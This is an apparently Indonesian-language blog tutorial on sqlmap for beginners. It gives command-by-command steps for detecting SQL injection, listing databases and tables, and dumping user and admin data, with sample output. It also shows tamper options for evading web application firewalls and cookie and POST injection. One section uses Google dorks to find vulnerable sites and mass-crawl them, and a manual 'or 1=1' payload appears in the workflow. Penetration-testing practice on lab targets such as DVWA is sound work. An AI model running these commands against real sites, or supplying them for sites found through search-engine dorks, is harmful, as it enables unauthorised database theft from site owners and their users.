SQLMap For Beginner

1. Install Sqlmap

# Linux (Kali/Parrot)
sudo apt update && sudo apt install sqlmap

# Atau clone dari GitHub
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev

2. Basic Usage

# Scan URL sederhana
sqlmap -u "http://target.com/page.php?id=1"

# Scan POST request (simpan request di file req.txt)
sqlmap -r req.txt

# Scan dari Burp Suite file
sqlmap -r burp_request.txt

3. Parameter Penting

-u URL          # Target URL
--dbs           # Enum database names
-D DB_NAME      # Specific database
--tables        # Enum tables
-T TABLE_NAME   # Specific table
--columns       # Enum columns
--dump          # Dump data
--dump-all      # Dump semua data
--batch         # Non-interactive (auto yes)
--risk=3        # Risk level (1-3)
--level=5       # Detection level (1-5)
--tamper=space2comment  # Bypass WAF

4. Contoh Praktis

Step 1: Scan & Detect

sqlmap -u "http://target.com/news.php?id=1" --batch --dbs

Output contoh:

available databases [2]:
[*] information_schema
[*] webapp_db

Step 2: Enum Tables

sqlmap -u "http://target.com/news.php?id=1" -D webapp_db --tables

Database: webapp_db
[5 tables]
+----------+
| users    |
| admin    |
| orders   |
| products |
| logs     |
+----------+

Step 3: Dump Data

# Dump specific table
sqlmap -u "http://target.com/news.php?id=1" -D webapp_db -T users --dump

# Dump semua
sqlmap -u "http://target.com/news.php?id=1" -D webapp_db --dump-all

5. Advanced Techniques

. Bypass WAF

sqlmap -u "http://target.com/page.php?id=1" \
--tamper=space2comment,between \
--random-agent \
--delay=2 \
--timeout=30

. POST Request

sqlmap -u "http://target.com/login.php" \
--data="username=admin&password=pass" \
--dump

. Cookie Injection

sqlmap -u "http://target.com/page.php" \
--cookie="PHPSESSID=abc123; user_id=1" \
--dump

. Custom Headers

sqlmap -u "http://target.com/" \
--headers="X-Forwarded-For: 127.0.0.1\nUser-Agent: Mozilla"

6. Google Dorking + Sqlmap

# Cari target vulnerable
google dorks: "inurl:news.php?id="

# Test massal
sqlmap -u "http://target.com/news.php?id=1" --crawl=3

7. Save Results

sqlmap -u "http://target.com/page.php?id=1" \
--dump \
--output-dir=/path/to/results/

8. Pro Tips

# Fast scan
sqlmap -u URL --batch --level=1 --risk=1

# Deep scan  
sqlmap -u URL --batch --level=5 --risk=3 --threads=10

# Check specific payload
sqlmap -u URL --technique=B

# Update sqlmap
cd sqlmap-dev && git pull

Workflow Pentest:

Recon → Burp/ZAP cari parameter
Test Manual → ' or 1=1 --
Sqlmap Auto → -u URL --dbs
Enum → -D db --tables --columns
Dump → --dump-all
Report → Screenshot + data

Coba praktek di DVWA atau bWAPP dulu boss! Ada yang bingung? Tanya aja 🔥

Press ESC to close

1. Install Sqlmap

2. Basic Usage

3. Parameter Penting

4. Contoh Praktis

Step 1: Scan & Detect

Step 2: Enum Tables

Step 3: Dump Data

5. Advanced Techniques

6. Google Dorking + Sqlmap

7. Save Results

8. Pro Tips

Workflow Pentest:

Share Article:

ZDGTL Reborn Media

Install SageMaker

advanced sqlmap commands